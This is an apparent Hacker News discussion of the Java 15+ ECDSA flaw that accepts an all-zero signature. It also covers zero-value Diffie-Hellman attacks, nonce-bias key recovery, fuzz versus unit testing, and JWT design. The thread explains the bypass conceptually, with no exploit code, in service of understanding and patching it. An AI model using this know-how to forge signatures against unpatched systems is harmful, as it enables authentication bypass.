[HN Gopher] Psychic Signatures in Java
___________________________________________________________________
Psychic Signatures in Java
Author : 19870213
Score : 120 points
Date : 2022-04-19 21:09 UTC (1 days ago)
(HTM) web link (neilmadden.blog)
(TXT) w3m dump (neilmadden.blog)
| pluc wrote:
| Not a good few months for Java
| tptacek wrote:
| This is probably the cryptography bug of the year. It's easy to
| exploit and bypasses signature verification on anything using
| ECDSA in Java, including SAML and JWT (if you're using ECDSA in
| either).
|
| The bug is simple: like a lot of number-theoretic asymmetric
| cryptography, the core of ECDSA is algebra on large numbers
| modulo some prime. Algebra in this setting works for the most
| part like the algebra you learned in 9th grade; in particular,
| zero times any algebraic expression is zero. An ECDSA signature
| is a pair of large numbers (r, s) (r is the x-coordinate of a
| randomly selected curve point based on the infamous ECDSA nonce;
| s is the signature proof that combines x, the hash of the
| message, and the secret key). The bug is that Java 15+ ECDSA
| accepts (0, 0).
|
| For the same bug in a simpler setting, just consider finite field
| Diffie Hellman, where we agree on a generator G and a prime P,
| Alice's secret key is `a mod P` and her public key is `G^a mod
| P`; I do the same with B. Our shared secret is `A^b mod P` or
| `B^a mod P`. If Alice (or a MITM) sends 0 (or 0 mod P) in place
| of A, then they know what the result is regardless of anything
| else: it's zero. The same bug recurs in SRP (which is sort of a
| flavor of DH) and protocols like it (but much worse, because
| Alice is proving that she knows a key and has an incentive to
| send zero).
|
| The math in ECDSA is more convoluted but not much more; the
| kernel of ECDSA signature verification is extracting the `r`
| embedded into `s` and comparing it to the presented `r`; if `r`
| and `s` are both zero, that comparison will always pass.
|
| It is much easier to mess up asymmetric cryptography than it is
| to mess up most conventional symmetric cryptography, which is a
| reason to avoid asymmetric cryptography when you don't absolutely
| need it. This is a devastating bug that probably affects a lot of
| different stuff. Thoughts and prayers to the Java ecosystem!
| DyslexicAtheist wrote:
| > Thoughts and prayers to the Java ecosystem!
|
| some very popular PKI systems (many CA's) are powered by Java
| and BouncyCastle ...
| nmadden wrote:
| BouncyCastle has its own implementation of ECDSA, and it's
| not vulnerable to this bug.
| na85 wrote:
| >infamous ECDSA nonce
|
| Why "infamous"?
| Dylan16807 wrote:
| I'm not particularly knowledgeable here, but I know it's
| extremely fragile, far beyond just needing to be unique. See
| "LadderLeak: Breaking ECDSA With Less Than One Bit of Nonce
| Leakage"
| SAI_Peregrinus wrote:
| It's more properly called 'k'. It's really a secret key, but
| it has to be unique per-signature. If an attacker can ever
| guess a single bit of the nonce with probability non-
| negligibly >50%, they can find the private key of whoever
| signed the message(s).
|
| It makes ECDSA _very_ brittle, and quite prone to side-
| channel attacks (since those can get attackers exactly such
| information.
| Mindless2112 wrote:
| There's an easy fix for that though -- generate k
| deterministically using the procedure in RFC6979 [1].
|
| [1]
| https://datatracker.ietf.org/doc/html/rfc6979#section-3.2
| drexlspivey wrote:
| That makes no sense, how can you get the private key from
| knowing 1 bit of the nonce?
| tptacek wrote:
| See, cryptography engineering is sinking in!
|
| Here you go:
|
| https://toadstyle.org/cryptopals/62.txt
|
| What's especially great about this is that it's very easy
| to accidentally have a biased nonce; in most other areas
| of cryptography, all you care about when generating
| random parameters is that they be sufficiently (ie, "128
| bit security worth") random. But with ECDSA, you need the
| entire domain of the k value to be random.
| drexlspivey wrote:
| Ok but for this scheme you need a large amount of
| signatures from the same biased RNG which makes sense. I
| thought that the GP was suggesting that you can recover
| the key from one signature with just a few bits.
| na85 wrote:
| I guess like so:
|
| https://cryptopals.com/sets/8/challenges/62.txt
|
| E: Thomas beat me to it
| Zababa wrote:
| Thank you for that, that was a great explanation.
| loup-vaillant wrote:
| Interestingly, EdDSA (generally known as Ed25519) does not need
| as many checks as ECDSA, and assuming the public key is valid,
| an all-zero signature will be rejected with the main checks.
| All you need to do is verify the following equation:
|
| _R = SB - Hash(R || A || M) A_
|
| Where _R_ and _S_ are the two halves of the signature, _A_ is
| the public key, and _M_ is the message (and _B_ is the curve 's
| base point). If the signature is zero, the equation reduces to
| _Hash(R || A || M)A = 0_ , which is always false with a
| legitimate public key.
|
| And indeed, TweetNaCl does not explicitly check that the
| signature is not zero. It doesn't need to.
|
| _However._
|
| There are still ways to be clever and shoot ourselves in the
| foot. In particular, there's the temptation to convert the
| Edwards point to Montgomery, perform the scalar multiplication
| there, then convert back (doubles the code's speed compared to
| a naive ladder). Unfortunately, doing that introduces edge
| cases that weren't there before, that cause the point we get
| back to be invalid. So invalid in fact that adding it to
| another point gives us zero half the time or so, causing the
| verification to succeed even though it should have failed!
|
| _(Pro tip: don 't bother with that conversion, variable time
| double scalarmult https://loup-vaillant.fr/tutorials/fast-
| scalarmult is even faster.)_
|
| A pretty subtle error, though with eerily similar consequences.
| It _looked_ like a beginner-nuclear-boyscout error, but my only
| negligence there was messing with maths I only partially
| understood. (A pretty big no-no, but I have learned my lesson
| since.)
|
| Now if someone could contact the Whycheproof team and get them
| to fix their front page so people know they have EdDSA test
| vectors, that would be great.
| https://github.com/google/wycheproof/pull/79 If I had known
| about those, the whole debacle could have been avoided. Heck, I
| bet my hat their ECDSA test vectors could have avoided the
| present Java vulnerability. They need to be advertised better.
| ptx wrote:
| Apparently you have to get a new CPU to fix this Java
| vulnerability, or alternatively a new PSU.
|
| (That is to say: a _Critical Patch Update_ or a _Patch Set
| Update_. Did they really have to overload these TLAs?)
| lobstey wrote:
| Not that a lot of companies are using the Java 15+. People
| generally stick to 8 or 11.
| needusername wrote:
| I believe Oracle 11 is affected.
| cesarb wrote:
| And once again, you'd be saved if you stayed on an older release.
| This is the third time this has happened recently in the Java
| world: the Spring4Shell vulnerability only applies to Java 9 and
| later (that vulnerability depends on the existence of a method
| introduced by Java 9, since all older methods were properly
| blacklisted by Spring), and the Log4Shell vulnerability only
| applies to log4j 2.x (so if you stayed with log4j 1.x, and didn't
| explicitly configure it to use a vulnerable appender, you were
| safe). What's going on with Java?
| KronisLV wrote:
| > ...the Log4Shell vulnerability only applies to log4j 2.x (so
| if you stayed with log4j 1.x, and didn't explicitly configure
| it to use a vulnerable appender, you were safe)
|
| Seems like someone likes to live dangerously: using libraries
| that haven't been updated since 2012 is a pretty risky move,
| especially given that if an RCE is discovered now, you'll find
| yourself without too many options to address it, short of
| migrating over to the new release (which will be worse than
| having to patch a single dependency in a backwards compatible
| manner): https://logging.apache.org/log4j/1.2/changes-
| report.html
|
| Admittedly, i wrote a blog post called "Never update anything"
| a while back, even if in a slightly absurdist manner:
| https://blog.kronis.dev/articles/never-update-anything and
| personally think that frequent updates are a pain to deal with,
| but personally i'd only advocate for using stable/infrequently
| updated pieces of software if they're still supported in one
| way or another.
|
| You do bring up a nice point about the recent influx of
| vulnerabilities and problems in the Java ecosystem, which i
| believe is created by the fact that they're moving ahead at a
| faster speed and are attempting to introduce new language
| features to stay relevant and make the language more inviting
| for more developers.
|
| That said, with how many GitHub outages there have been in the
| past year and how many other pieces of software/services have
| broken in a variety of ways, i feel like chasing after a more
| rapid pace of changes and breaking things in the process is an
| industry wide problem.
| yardstick wrote:
| > using libraries that haven't been updated since 2012 is a
| pretty risky move
|
| I disagree. Some libraries are just rock solid, well tested
| and long life.
|
| In the case of log4j 1.x vs 2.x, has there been any real
| motivator to upgrade? There are 2 well known documented
| vulnerabilities in 1.x that only apply if you use extensions.
| KronisLV wrote:
| A sibling comment mentions the reload4j project, so clearly
| someone thought that 1.x wasn't adequate to a degree of
| creating a new project around maintaining a fork. Can't
| speak of the project itself, merely the fact that its
| existence supports the idea that EOL software is something
| that people would prefer to avoid, even if they decide to
| maintain a backwards compatible fork themselves, which is
| great to see.
|
| Here's a bit more information about some of the
| vulnerabilities in 1.x, someone did a nice writeup about
| it: https://www.petefreitag.com/item/926.cfm
|
| I've also dealt with 1.x having some issues with data loss,
| for example, https://logging.apache.org/log4j/1.2/apidocs/o
| rg/apache/log4... which is unlikely to get fixed:
| DailyRollingFileAppender has been observed to exhibit
| synchronization issues and data loss.
|
| (though at least in regards to that problem, there are
| alternatives; though for the most part EOL software implies
| that no further fixes will be available)
|
| But at the end of the day none of it really matters: those
| who don't want to upgrade won't do so, potential issues
| down the road (or even current ones that they're not aware
| of) be damned. Similarly, others might have unpatched
| versions of 2.x running somewhere which somehow haven't
| been targeted by automated attacks (yet) and might continue
| to do so while there isn't proper motivation to upgrade, or
| won't do so until it will be too late.
|
| Personally, i dislike the idea of using abandoned software
| for the most part, when i just want to get things done - i
| don't have the time to dance around old documentation, dead
| links, having to figure out workarounds for CVEs versus
| just using the latest (stable) versions and letting someone
| else worry about it all down the road. Why take on an
| additional liability, when most modern tooling and
| framework integrations (e.g. Spring Boot) will be built
| around the new stuff anyways? Though thankfully in regards
| to this particular case slf4j gives you more flexibility,
| but in general i'd prefer to use supported versions of
| software.
|
| I say that as someone who actually migrated a bunch of old
| monolithic Spring (not Boot) apps to something more modern
| when the versions had been EOL for a few years and there
| were over a hundred CVEs as indicated by automated
| dependency/package scanning. It took months to do, because
| previously nobody actually cared to constantly follow the
| new releases and thus it was more akin to a rewrite rather
| than an update - absolute pain, especially that JDK 8 to 11
| migration was also tacked on, as was containerizing the app
| due to environmental inconsistencies growing throughout the
| years to the point where the app would roll over and die
| and nobody had any idea why (ahh, the joys of working with
| monoliths, where even logs, JMX and heap dumps don't help
| you).
|
| Of course, after untangling that mess, i'd like to suggest
| that you should not only constantly update packages (think
| every week, alongside releases; you should also release
| often) but also keep the surface area of any individual
| service small enough that they can be easily
| replaced/rewritten. Anyways, i'm going off on a tangent
| here about the greater implications of using EOL stuff long
| term, but those are my opinions and i simultaneously do
| admit that there are exceptions to that approach and
| circumstances vary, of course.
| cesarb wrote:
| > especially given that if an RCE is discovered now, you'll
| find yourself without too many options to address it, short
| of migrating over to the new release
|
| Luckily, there's now an alternative: reload4j
| (https://reload4j.qos.ch/) is a maintained fork of log4j 1.x,
| so if you were one of the many who stayed on the older log4j
| 1.x (and there were enough of them that there was sufficient
| demand for that fork to be created), you can just migrate to
| that fork (which is AFAIK fully backward compatible).
|
| (And if you do want to migrate away from log4j 1.x, you don't
| need to migrate to log4j 2.x; you could also migrate to
| something else like logback.)
| ragnese wrote:
| Was Spring4Shell Java's fault, or Spring's fault? Log4Shell was
| obviously (mostly) log4j's fault.
|
| This one, I gather, is actually Java's fault.
|
| It sounds like three unrelated security bugs from totally
| different teams of developers.
| brazzy wrote:
| I think they other two are considered "Javas's fault" because
| the frameworks they occurred in are so pervasive in the Java
| ecosystem that you might as well consider them part of the
| standard library.
| jatone wrote:
| _gasp_ new code can introduce bugs... whatever will one do?!
| taeric wrote:
| You make this sound like it is unique to java. I remember
| heartbleed had similar, in that the lts I was on did not have
| the vulnerable library.
|
| At some level, as long as releases add functionality, the basic
| rules of systemantics will guarantee unintended interactions.
| ccbccccbbcccbb wrote:
| Q: Which type of cryptography is implied to be unsafe in the
| following sentence?:
|
| "Immediately ditch RSA in favor of EC, for it is too hard to
| implement safely!"
| tedunangst wrote:
| What's java's RSA history look like?
| RandomBK wrote:
| Does anyone know why this was only given a CVSS score of 7.5?
| Based on the description this sounds way worse, but Oracle only
| gave it a CVSS Confidentiality Score of "None", which doesn't
| sound right. Is there some mitigating factor that hasn't been
| discussed?
|
| In terms of OpenJDK 17 (latest LTS), the issue is patched in
| 17.0.3, which was release ~12h ago. Note that official OpenJDK
| docker images are still on 17.0.2 as of time of writing.
| tptacek wrote:
| CVSS is a completely meaningless Ouija board that says whatever
| the person authoring the score wants it to say.
| m00dy wrote:
| I thought java was disappeared in the previous ice age.
| 0des wrote:
| I want to live in this world, but no.
| [deleted]
| bertman wrote:
| The fix for OpenJDK (authored on Jan. 4th 22):
|
| https://github.com/openjdk/jdk/blob/e2f8ce9c3ff4518e070960ba...
| sdhfkjwefs wrote:
| Why are there no tests?
| drexlspivey wrote:
| with commit message "Improve ECDSA signature support" :D
| tialaramex wrote:
| This is the sort of dumb mistake that ought to get caught by unit
| testing. A junior, assigned the task of testing this feature,
| ought to see that in the cryptographic signature design these
| values are checked as not zero, try setting them to zero, and...
| watch it burn to the ground.
|
| Except that, of course, people don't actually do unit testing,
| they're too busy.
|
| Somebody is probably going to mention fuzz testing. But, if
| you're "too busy" to even write the unit tests for the software
| you're about to replace, you aren't going to fuzz test it are
| you?
| tptacek wrote:
| The point of fuzz testing is not having to think of test cases
| in the first place.
| kasey_junk wrote:
| This is true in principle but in practice most fuzz testing
| frameworks demand a fair bit of setup. It's worth it!
|
| But if you are in a time constrained environment where basic
| unit tests are skipped fuzz testing will be as well.
| loup-vaillant wrote:
| You still need your tests to cover all possible errors (or at
| least all _plausible_ errors). If you try random numbers and
| your prime happens to be close to a power of two, evenly
| distributed random numbers won 't end up outside the [0,n-1]
| range you are supposed to validate. Even if your prime is far
| enough from a power of two, you still won't hit zero by
| chance (and you need to test zero, because you almost
| certainly need two separate pieces of code to reject the =0
| and >=n cases).
|
| Another example is Poly1305. When you look at the test
| vectors from RFC 8439, you notice that some are specially
| crafted to trigger overflows that random tests wouldn't
| stumble upon.
|
| Thus, I would argue that proper testing requires some domain
| knowledge. Naive fuzz testing is bloody effective but it's
| not enough.
| cliftonk wrote:
| That's all true, but fuzz testing is very effective at
| checking boundary conditions (near 0, near max/mins) and
| would have caught this particular problem easily.
| loup-vaillant wrote:
| Do you mean fuzz testing does _not_ use even
| distributions? There's a bias towards extrema, or at
| least some guarantee to test zero and MAX? I guess that
| would work.
|
| Also, would you consider the following to be fuzz
| testing? https://github.com/LoupVaillant/Monocypher/blob/
| master/tests...
| tialaramex wrote:
| [Somebody had down-voted you when I saw this, but it wasn't
| me]
|
| These aren't alternatives, they're complementary. I
| appreciate that fuzz testing makes sense over writing unit
| tests for weird edge cases, but "these parameters can't be
| zero" isn't an edge case, it's part of the basic design.
| Here's an example of what X9.62 says:
|
| > If r' is not an integer in the interval [1, n-1], then
| reject the signature.
|
| Let's write a unit test to check say, zero here. Can we also
| use fuzz testing? Sure, why not. But lines like this ought to
| _scream out_ for a unit test.
| tptacek wrote:
| Right, I'm just saying: there's a logic that says fuzz
| tests are easier than specific test-cases: the people that
| run the fuzz tests barely need to understand the code at
| all, just the basic interface for verifying a signature.
| solarengineer wrote:
| If we write an automated test case for known acceptance
| criteria, and then write necessary and sufficient code to get
| those tests to pass, we would know what known acceptance
| criteria are being fulfilled. When someone else adds to the
| code and causes a test to fail, the test case and the
| specific acceptance criteria would thus help the developer
| understand intended behaviour (verify behaviour, review
| implementation). Thus, the test suite would become a
| catalogue of programmatically verifiable acceptance criteria.
|
| Certainly, fuzz tests would help us test boundary conditions
| and more, but they are not a catalogue of known acceptance
| criteria.
| anfilt wrote:
| While fuzz testing is good and all, when it comes to
| cryptography, the input spaces is so large that chances of
| finding something are even worse than finding a needle in a
| hay stack.
|
| For instance here the keys are going to be around 256 bits in
| a size, so if your fuzzer is just picking keys at random,
| your basically never likely to pick zero at random.
|
| With cryptographic primitives you really should be testing
| all known invalid input parameters for the particular
| algorithm. A a random fuzzer is not going to know that.
| Additionally, you should be testing inputs that can cause
| overflows and are handled correctly ect...
| hsbauauvhabzb wrote:
| The issue is the assumption juniors should be writing the unit
| tests, sounds like you might be part of the problem.
| tialaramex wrote:
| I think I probably technically count as a junior in my
| current role, which is very amusing and "I don't write enough
| unit tests" was one of the things I wrote in the self-
| assessed annual review.
|
| So, sure.
| [deleted]
| LaputanMachine wrote:
| >Just a basic cryptographic risk management principle that
| cryptography people get mad at me for saying (because it's true)
| is: don't use asymmetric cryptography unless you absolutely need
| it.
|
| Is there any truth to this? Doesn't basically all Internet
| traffic rely on the security of (correctly implemented)
| asymmetric cryptography?
| fabian2k wrote:
| I've seen this argument often on the topic of JWTs, which are
| also mentioned in the tweets here. In many situations there are
| simpler methods than JWTs that don't require any cryptography,
| e.g. simply storing session ids server-side. With these simple
| methods there isn't anything cryptographic that could break or
| be misused.
|
| The TLS encryption is of course assumed here, but that is
| nothing most developers ever really touch in a way that could
| break it. And arguably this part falls under the "you
| absolutely need it" exception.
| jaywalk wrote:
| Server-side session storage isn't necessarily a replacement
| for JWTs. It can be in many cases, but it's not one to one.
| JWTs do have advantages.
| fabian2k wrote:
| That's why I wrote "in many cases". The problem is more
| that for a while at least JWT were pretty much sold as the
| new and shiny replacement for classic sessions, which
| they're not. They absolutely have their uses, but they also
| have additional attack surface.
| [deleted]
| slaymaker1907 wrote:
| You can still use encryption with JWTs if you use a symmetric
| key. I believe HS256 just uses a symmetric key HMAC with
| SHA256. If you go beyond JWT, Kerberos only uses symmetric
| cryptography while not being as centralized as other
| solutions. Obviously, the domain controller is centralized,
| but it allows for various services to use common
| authentication without compromising the whole domain if any
| one service is compromised (assuming correct configuration
| which is admittedly difficult with Kerberos).
| er4hn wrote:
| The biggest problem with JWTs is not what cryptography you
| use (though there was a long standing issue where "none" was
| something that clients could enter as a client side
| attack...) but rather revocation.
|
| x509 certificates have several revocation mechanisms since
| having something being marked as "do not use" before the end
| of its lifetime is well understood. JWTs are not quite there.
| codebje wrote:
| JWT is just a container for authenticated data. it's
| comparable to the ASN.1 encoding of an x509 certificate,
| not to the entire x509 public key infrastructure.
|
| You could compare x509 with revocation to something like
| oauth with JWT access tokens, though.
|
| In that case, x509 certificates are typically expensive to
| renew and have lifetimes measured in years. Revocation
| involves clients checking a revocation service. JWT access
| tokens are cheap to renew and have lifetimes measured in
| minutes. Revocation involves denying a refresh token when
| the access token needs renewing. Clients can also choose to
| renew access tokens much more frequently if a 'revocation
| server' experience is desirable.
|
| Given the spotty history of CRLDP reliability, I think
| oauth+JWT are doing very well in comparison. I'm pretty
| damn confident that when I revoke an application in Google
| or similar it will lose access very quickly.
| lazide wrote:
| Initial connection negotiation and key exchange does, anything
| after that no. It will use some kind of symmetric algo
| (generally AES).
|
| It's a bad idea (and no one should be doing it) to continue
| using asymmetric crypto algorithms after that. If someone can
| get away with a pre-shared (symmetric) key, sometimes/usually
| even better, depending on the risk profiles.
| formerly_proven wrote:
| I wouldn't be particularly worried of someone decrypting a file
| encrypted in the 80s using Triple DES anytime soon. I don't
| think I'll live to see AES being broken.
|
| I wouldn't bet on the TLS session you're using to have that
| kind of half life.
| smegsicle wrote:
| if people were getting mad at him, he must have been pretty
| obnoxious about it because i don't think there's much
| controversy- Asymmetric encryption is pretty much just used for
| things like sharing the Symmetric key that will be used for the
| rest of the session
|
| of course it would be more secure to have private physical key
| exchange, but that's not a practical option, so we rely on RSA
| or whatever
| nicoburns wrote:
| > Is there any truth to this?
|
| Yes, symmetric cryptography is a lot more straightforward and
| should be preferred where it is easy to use a shared secret.
|
| > Doesn't basically all Internet traffic rely on the security
| of (correctly implemented) asymmetric cryptography?
|
| It does. This would come under the "unless you absolutely need
| it" exception.
| lobstey wrote:
| I doubt how many companies are actually using java15+. Many still
| sticks to 8 or 11
___________________________________________________________________
(page generated 2022-04-20 23:00 UTC)